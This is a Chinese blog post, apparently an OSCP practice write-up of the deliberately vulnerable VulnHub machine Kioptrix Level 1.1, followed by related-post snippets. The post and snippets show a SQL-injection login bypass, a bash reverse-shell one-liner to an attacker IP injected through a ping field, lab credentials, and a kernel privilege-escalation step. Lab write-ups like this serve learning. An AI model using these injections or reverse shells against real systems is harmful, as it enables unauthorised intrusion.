oscp——Kioptrix: Level 1.1 (#2)

最新推荐文章于 2024-02-18 14:58:30 发布
最新推荐文章于 2024-02-18 14:58:30 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: oscp
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/104407873
版权

0x00 前言

第三十二台机子

0x01 信息收集

在这里插入图片描述
在这里插入图片描述

0x02 Web80-webshell

访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码
在这里插入图片描述
成功进入后台,可以看到是一个执行ping命令的执行窗口
在这里插入图片描述
这里反弹一下shell,这里使用

bash -i >& /dev/tcp/192.168.0.111/1234 >&1

在这里插入图片描述

然后在/var/www/html目录下找到一个index文件,这里可以看道一个账号密码

"john", "hiroshima"

在这里插入图片描述
这里是了一下su,但是没有成功,然后mysql连接一下,找到一个密码
在这里插入图片描述

|    1 | admin    | 5afac8d85f |
|    2 | john     | 66lajGGbla |

0x03 webshell——rootshell

这里su 一下,但是发现密码还是错的,查一下内核版本
在这里插入图片描述
上网查了一下,可以用8542进行提权,编译一下,机子可能比较老。。。都没有放flag
在这里插入图片描述

0x04 总结

这个机子没什么坑,难度也不大

王嘟嘟_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OSCP-1-2-sar(反向下载webshell)
墨痕诉清风的博客
05-17 70
也可以写一个shell.php,wget下载后执行该shell.php。这里强调一下,该命令也可以找到可写权限的文件。可以看到5分钟root执行一次该脚本。登录robots.txt。执行shell.php。登录sar2HTML。等待5分钟,提权成功。
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 808
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
KIOPTRIX: LEVEL 1 (#1)】
最新发布
qq_74240553的博客
02-18 239
vulnhub靶机
靶场实战(18):OSCP备考之VulnHub MY CMSMS
OneMoreThink
01-18 466
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)80端口/HTTP服务组件漏洞URL漏洞3306端口/MySQL服务组件漏洞口令漏洞80端口/HTTP服务URL漏洞URL漏洞提升权限www-data用户sudosuidcron内核提权信息收集armour用户sudo 1、资产发现1.1、主机发现本次靶场MY CMSMS[1]指定IP,不涉及主机发现过程。1.2、服务发现使用命令sudo ...
kioptrix-level-1
cxyzupup的博客
01-10 9959
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
网络安全专业名词解释
热门推荐
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解.
KIOPTRIX: LEVEL 1.1 (#2)
logan_logan的博客
12-19 184
KIOPTRIX: LEVEL 1.1 (#2) 1.在浏览器输入地址,打开网页发现是一个登录框;接下来进行信息收集; 2.信息收集 2.1端口扫描 使用nmap工具发现可以枚举很多的端口,后面因为找到了其它漏洞就没有进行尝试; 2.2目录枚举 使用gobuster工具进行枚举,但是没有什么帮助; 3.漏洞探测 3.1 登录框存在sql注入漏洞,使用万能密码 admin’ or’1’=’1可以登录; 3.2 对登录之后的界面进行探测的时候发现存在命令注入漏洞; 4.漏洞利用 4.1 反弹she
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 922
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 452
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
vulnhub Kioptrix: Level 1.1 (#2)
箭雨镜屋
11-19 2604
本文的攻击路径是:端口扫描-->万能密码web登录-->RCE获得反弹shell-->系统版本漏洞提权
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP备忘单:我的OSCP速查表
02-13
OSCP作弊表 [下载文件(Curl / Wget)] [使用PowerShell下载文件] 常用命令 Python HTTP服务器: python -m SimpleHTTPServer [PORT] Python FTP服务器: python -m pyftpdlib -p 21 Linux侦听器: nc -lnvp ...
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
OSCP-Stuff:我通过OSCP所做的工作清单
05-23
OSCP资料我通过OSCP所做的工作清单:D
oscp练习目录
王嘟嘟的博客
01-25 1万+
0x00 前言 这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。 0x01 vulnhub总览 题目 链接 文章链接 Me and My Girlfriend 1 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ https://blog.csdn.net/qq_36...
oscp——htb——Lazy
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
oscp——symfonos:3
王嘟嘟的博客
01-16 1万+
0x00 前言 这个是练习的第6个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-3,332/ 参考文章 https://www.wandouip.com/t5i400700/ https://cloud.tencent.com/developer/article/1523899 0x01 实验 1.信息收集 1.1 ip收集 1.2 开放端口 ...
oscp relia
12-21
OSCP(Offensive Security Certified Professional)是一种信息安全认证,它着重于渗透测试和攻击技术。OSCP认证考试涵盖了网络渗透测试、漏洞利用、社会工程学和渗透测试工具的使用等内容。持有OSCP认证的专业人员通常具有深厚的渗透测试技能和经验,能够有效地识别和利用系统和网络中存在的漏洞,进而提供相应的建议和解决方案,以提高组织的安全性防御水平。 OSCP认证对于从事信息安全领域的专业人士来说,具有非常高的含金量和认可度。通过攻克OSCP认证考试,不仅可以提升个人在行业内的知名度和竞争力,还能够为个人的职业发展带来更多的机会和挑战。因此,越来越多的安全从业者和企业选择通过学习和考取OSCP认证来提升自己在渗透测试领域的专业能力和地位。 总的来说,OSCP认证是一项具有挑战性和实用性的信息安全认证,它能够帮助从业者全面提升自己的技术水平和职业发展前景。持有OSCP认证的渗透测试专业人员不仅拥有丰富的实战经验,还能够为企业提供专业、高效的安全防御与风险管理服务。因此,OSCP认证在当前信息安全行业中拥有非常重要的地位和价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值